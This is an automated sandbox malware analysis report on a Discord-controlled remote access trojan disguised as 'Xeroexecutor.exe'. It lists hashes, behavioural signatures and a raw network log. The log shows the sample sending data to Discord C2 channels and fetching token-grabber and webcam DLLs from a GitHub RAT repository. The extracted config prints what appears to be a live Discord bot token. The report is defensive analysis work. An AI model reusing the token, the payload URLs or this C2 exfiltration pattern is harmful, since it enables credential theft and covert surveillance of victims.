Analysis
Max time kernel: 125s
Max time network: 126s
Platform: windows10-1703_x64
Resource: win10-20240404-en
Resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
Submitted: 09/05/2024, 14:23 UTC
Behavioral task
behavioral1
Sample: Xeroexecutor.exe
Resource: win10-20240404-en
General
Target: Xeroexecutor.exe
Size: 78KB
MD5: a4b35f10a18f1c4360b00f828abbc2b5
SHA1: 78c9ba86d8b3ca966b66ddb182c08268c79858a6
SHA256: b4ca7c2c6efafb1d7402096885dcae56f6fb3d845b758ed3c1cfef21792e1444
SHA512: 47703141997cae647f52f692a62b38bc7543f739b5334f387f8753716cadb488898abeda21732b13c7153e0bcbc76a44c9d821f899c3b137892587538296bb3b
SSDEEP: 1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+KPIC:5Zv5PDwbjNrmAE+WIC
Malware Config
Extracted
discordrat
discord_token: MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
server_id: 1237709600602722354
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Downloads MZ/PE file
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 15 IoCs)
flow  ioc
12    discord.com
17    raw.githubusercontent.com
25    raw.githubusercontent.com
3     discord.com
14    discord.com
15    discord.com
28    discord.com
4     discord.com
19    discord.com
21    discord.com
27    discord.com
8     discord.com
11    discord.com
18    raw.githubusercontent.com
26    discord.com
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description                 pid   Process
Token: SeDebugPrivilege     2676  Xeroexecutor.exe
Token: SeShutdownPrivilege  2676  Xeroexecutor.exe
Processes
Network
-
Remote address: 8.8.8.8:53
Request
gateway.discord.gg IN A
Response
gateway.discord.gg IN A 162.159.135.234
gateway.discord.gg IN A 162.159.133.234
gateway.discord.gg IN A 162.159.130.234
gateway.discord.gg IN A 162.159.136.234
gateway.discord.gg IN A 162.159.134.234
-
Remote address: 162.159.135.234:443
Request
GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: 26iAYpXxRTASShXuIDK1Ig==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg
Response
HTTP/1.1 101 Switching Protocols
Connection: upgrade
sec-websocket-accept: xvw7DTNjAc820iBnkI2DQMdFcAQ=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNERUNV4VWnm0NklWCs0C%2BlWctksfZgkcnYz2Kr8ai6nIHEo4CiC5jW6S1rH1jT5QE%2Bg4xOIyBTJHbuIBcomwbS7JtaT1PqQjvqI70zaJT3o50kvAu4fxwlP4rOXTBDtoCJxEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8812591f6d4460dd-LHR
-
Remote address: 8.8.8.8:53
Request
discord.com IN A
Response
discord.com IN A 162.159.136.232
discord.com IN A 162.159.137.232
discord.com IN A 162.159.135.232
discord.com IN A 162.159.138.232
discord.com IN A 162.159.128.233
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/guilds/1237709600602722354/channels HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive
Response
HTTP/1.1 201 Created
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b9274f580e0f11efa46a7a13f4bcce61; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1999
x-ratelimit-reset: 1715351016.418
x-ratelimit-reset-after: 86400.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2F0H9GkPG7sZjznhax8JHbW6pJ72LhTI7unnyaDpkuJ0WH7a4NOC6WUOU3jptLViuDCjLHG2rbHIyZx5mc7vmQEeigIvK84iH%2FM4qDjERL%2BXzARWMRYn%2BhioM1c2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b9274f580e0f11efa46a7a13f4bcce615a4b103059f82c89957e4d041c301ced9ffe6c9540ce712e90bb1456cc39b7f3; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=db113242c805bd68379ae757c1d2a7326a199ad8-1715264616; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=x86uKguZnLGbKrcpwAH8x9QMLXs3Tm_4neGZTg9lw_E-1715264616588-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8812592bdca57324-LHR
-
Remote address: 8.8.8.8:53
Request
234.135.159.162.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
geolocation-db.com IN A
Response
geolocation-db.com IN A 159.89.102.253
-
Remote address: 159.89.102.253:443
Request
GET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive
Response
HTTP/1.1 301 Moved Permanently
Date: Thu, 09 May 2024 14:23:36 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
-
Remote address: 159.89.102.253:443
Request
GET /json/ HTTP/1.1
Host: geolocation-db.com
Response
HTTP/1.1 200 OK
Date: Thu, 09 May 2024 14:23:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 116
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b9b7ce340e0f11efb257dadefbae2c79; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264618.361
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXAORW3WOUuIhRTr952VRUOQ07sWTOjYUOXsMclguNQwxj%2BYlnGS6lo%2BLApNeMgkBM0yHAZLn29eSDqZhWfjkYmFN7Re%2FRZJpsMsn%2BMknSChVMgJrkV3kGnj2Gal"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b9b7ce340e0f11efb257dadefbae2c79d456d5a29d6e8a7e54f42fc3a484543b10e3c8096b4fc673cf3ea53082b42237; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c3b3aa51e84a0bce716afb777fac4983703e1d6d-1715264617; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=QQo4n5cBgvbVnTOsv3D8uysehUQ1oePMyuQRKc1cFEk-1715264617536-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125931cdd276cc-LHR
-
Remote address: 8.8.8.8:53
Request
232.136.159.162.in-addr.arpa IN PTR
Response
-
Remote address: 8.8.8.8:53
Request
253.102.89.159.in-addr.arpa IN PTR
Response
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: multipart/form-data; boundary="0b7af09f-1a4b-473f-8fee-8a83f669034f"
Host: discord.com
Content-Length: 429690
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c107038a0e0f11efba074a1ad3516406; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264630.216
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyYc5VkzTsbhb9%2FdVZbBQrV6ZL0Q61UeXiSsmq2MAuEtSrG2OoVhVOyjGILnuu9xRvlSN1g7rAJYz4qJ%2FIu3jR3JYZslDWdJK4LYaQlU3HWe43GdICL1EXtG0vnj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c107038a0e0f11efba074a1ad351640653ccf9503c86a9a31b8920d67b48c40cc30853fe42bae314dddafc93311fdeb8; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=4d2d09abd90ca0308dbeac8f4c7934388a76aded-1715264629; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=NhHutmer7BF2rF3rPM1QEhsMaFETW4khjoyEn3bv5LU-1715264629800-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125979c834941b-LHR
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c13bc9120e0f11efa5cd7ef7caddeb3d; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264631.221
x-ratelimit-reset-after: 1.175
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2FlY15EmmpCTtkAfjZ08xu8JBudQ4HwOHL3GbWm%2FR0zLF60GEraeXlyZq22NIpYs6%2BQMbDViGfSoqRTFnYvQYYjdyIZlnTOBmSZUYFzETHqeHJZW9Kxeif25dCG4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c13bc9120e0f11efa5cd7ef7caddeb3db108e21db7ccbf144bb2f3824b4a9082d25bfc3d56ddc7922c57ec6f3d3cc63f; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=f6cfec3732f0bed84bd169e004f9f2931489d36a-1715264630; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=EU8qKb_d503I2bIYIJdoQwb_9QiZmjlT8z0hfx8uz8k-1715264630146-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259810d17949c-LHR
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: multipart/form-data; boundary="9c70f21a-37b0-4f9d-a736-294f6de117c8"
Host: discord.com
Content-Length: 3557
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c9291fee0e0f11ef87867ee3850b10bd; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264644.031
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iI7Zkamq078CQMvt6hNUdHZ%2F5xRX0buDZIocaVQsrPB0DUlt7IsgWOLSWkDi3gv07kJi4DXUpbfxnn3KNZtemdHb0ywnzicamcc6ew9RpKZGheBNKOAOWlT%2FePU7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c9291fee0e0f11ef87867ee3850b10bd6eaca715e2631d527c05eba598e51446694bf93584aaba494cd060d32632f86f; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=kp9yikD.9AYczCKuJwmPGejBrw3hBQVPx0UVH4eMz34-1715264643444-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259d1bdaa24b7-LHR
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264645.025
x-ratelimit-reset-after: 1.329
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCsvN0eqnwTCJaL1OdCL%2BqjaPjVUJgpcbCpYtyfGpC8pM4L9wbGoatS80zuj0Md9DNJIwJgE5gS2GDeyvSxkqMupLwxtAnL15%2BbIipbzhKp1RfRaCKS7Leo0gvos"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae4cba57d10d1d3d3844b4c3cae959069cc3daa742ab76399ec891938ffaa5a278; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=CQscJ9x_5JYZd0RB6OnAZ8Q1AOZDkPd1P6K_ZvZQZg8-1715264643815-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259d649867198-LHR
-
Remote address: 8.8.8.8:53
Request
raw.githubusercontent.com IN A
Response
raw.githubusercontent.com IN A 185.199.109.133
raw.githubusercontent.com IN A 185.199.111.133
raw.githubusercontent.com IN A 185.199.108.133
raw.githubusercontent.com IN A 185.199.110.133
-
GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll (Xeroexecutor.exe)
Remote address: 185.199.109.133:443
Request
GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Content-Length: 2901504
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "7aa094c7a5e7645371637e2935e65a95ac7ec8899b4f08b38009a9f1887128d9"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 520A:17E061:3B5A3F:48EFFD:663CDCA6
Accept-Ranges: bytes
Date: Thu, 09 May 2024 14:24:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600085-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1715264679.998598,VS0,VE199
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 538f4d5eff5fb505522334cff6a94d1eacf807e9
Expires: Thu, 09 May 2024 14:29:39 GMT
Source-Age: 0
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 20
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=df0afe720e0f11efb08556f99f94da73; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264681.039
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lsb8%2Bn1SuAGTkjVowoOxZUylyCfidozjUPeP00CyWftmp4qo6IELWnv3MsquYyWaFQfCUXzjkyfcFvMTBfxw8ZKSVydMZyenb8I70v%2FoKhalU4N%2BCVQkbqG8Vr7q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=df0afe720e0f11efb08556f99f94da7330d953b55fa52cc76d030e691d48b209c471300f16eef5692765464f2041e819; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=7QIfCTAc5akM358jxHdiJsw2fON.ylycnpSku4SM51Q-1715264680162-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125ab939179503-LHR
-
Remote address: 8.8.8.8:53
Request
133.109.199.185.in-addr.arpa IN PTR
Response
133.109.199.185.in-addr.arpa IN PTR cdn-185-199-109-133githubcom
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=df3f10ae0e0f11ef8953a27d37c5972a; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264682.039
x-ratelimit-reset-after: 1.630
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sanHyNzJwbZDqLJKKi5cV4xBSNAPYQ2p8ZcCX5D4g3W69q7WSmnU%2F4x%2FEMcohuQ8CRbktFIq%2Fks3eFhJmhB4cE3iXmgjGehiImt%2Bkr3KiSgCE%2FIK9WNWgwhfB6Og"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=df3f10ae0e0f11ef8953a27d37c5972a1e8724111627e64e20fe8ec32ee64f6aeb9861ede0d2d28478b6e9369b085f06; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=6IfMpQHY4tG9KbUqXiMqNRrfoBEVKM8ap_LuFxwTFeE-1715264680514-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125abbca3a79c6-LHR
-
Remote address: 8.8.8.8:53
Request
13.227.111.52.in-addr.arpa IN PTR
Response
-
GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll (Xeroexecutor.exe)
Remote address: 185.199.109.133:443
Request
GET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll HTTP/1.1
Host: raw.githubusercontent.com
Response
HTTP/1.1 200 OK
Content-Length: 39936
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "f50f41ce6d31d22a2bffcc57235e46a4d7a05fb38896fd150333f34701eb4b56"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 515C:1CC8B4:2ED44A:397B90:663CDCBE
Accept-Ranges: bytes
Date: Thu, 09 May 2024 14:25:10 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600096-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1715264711.545413,VS0,VE157
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 13e5eacf71b2ed7f841b43abb8b0846c6807e6c7
Expires: Thu, 09 May 2024 14:30:10 GMT
Source-Age: 0
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=f181d76a0e0f11efb6b79ac70ff69aa5; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264712.004
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Fu8bG6l90l9JOVacq7Pa4cghpHOoWWMnB%2FZeFyCfBH%2Ft6EPG0Qf9LSPf9zU2BEkR%2BzBetIlsafnoZJ75DAcob10PQz4vGhVT89cIKfEXGY%2BXIBhi6aVdeChPul2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=f181d76a0e0f11efb6b79ac70ff69aa5f0e09a6a2ccd5fe0edea1959d498408e6e9fd9d42fbd5775fee476eb4a9324f3; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=_6stMbfZGNtJeHtgtFb9NqukjykNIaUUXTzLq.f4tWI-1715264711133-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125b7b0ac77735-LHR
-
Remote address: 162.159.136.232:443
Request
POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
Response
HTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=f1b5d7720e0f11ef8ac69a2afe861c28; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264713.003
x-ratelimit-reset-after: 1.625
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fYgpmitI9XGFTCOECvkpOA77LqT3aIuvGWvg0pGqiWcZDl8AmZOQQybcpcccv6TE%2BuOcmkUDDnt55xMQe9%2Bd%2BFtlO45gwrjvOXUUczNPIRSd48e5NquGAotuF5P"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
